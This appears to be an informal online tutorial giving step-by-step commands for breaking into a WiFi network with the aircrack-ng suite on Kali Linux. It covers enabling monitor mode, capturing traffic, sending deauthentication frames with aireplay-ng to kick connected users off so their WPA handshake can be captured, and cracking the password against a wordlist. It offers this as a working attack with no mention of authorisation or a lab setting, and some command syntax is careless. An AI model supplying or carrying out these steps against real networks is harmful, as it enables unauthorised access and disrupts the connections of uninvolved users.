How to hack WiFi with Kali Linux using aircrack-ng:

1.)Switch on monitor mode with"airmon-ng check kill && airmon-ng start wlan0".(you can check your WiFi card number with "airmon-ng")

2.)confirm whether monitor-mode is on by using "ifconfig" and check if you see an interface named wlan0mon or if it ends with 'mon'(note the interface name)

3.) next step is to open Airodump-ng with the new WiFi interface,do that with "airodump-ng -i yournewinterface I.e wlan0mon where -i is used to specify the interface

4.)check the WiFi essid(name) to check if it is present then not the Mac address,channel number and Essid

5.)close airodump- ng with Ctrl+C and reopen with "airodump-ng --bssid The|noted|bssid -c channel|number -i the|Noted|Interface -w output|Name(any name you wish).

6.)open another tab or terminal and we will be using aireplay-ng to kick away connected users and force them to reconnect so we can capture the 4-way handshake.

7.)in the new tab/terminal, use "aireplay-ng --deauth 10 -a macaddress wlan0mon(or the noted interface).
You should notice that the data section on airodump-ng start counting packets received (you can try again to make sure that you get enough EAPOL packets that will be. cracked.

8.)next step is to crack the WiFi password with aircrack-ng using "aircrack-ng Saved|airodump|File -w wordlist-name.
IF cracking is successful, you should see the password printed to the screen.

note:sorry for not including pictures,I don't have enough time and if you follow the above steps carefully,you should be able to crack the WiFi password.

If password not found,use another wordlist or if aircrack-ng says no EAPOL packet detected,wait for a client to connect to the target WiFi network
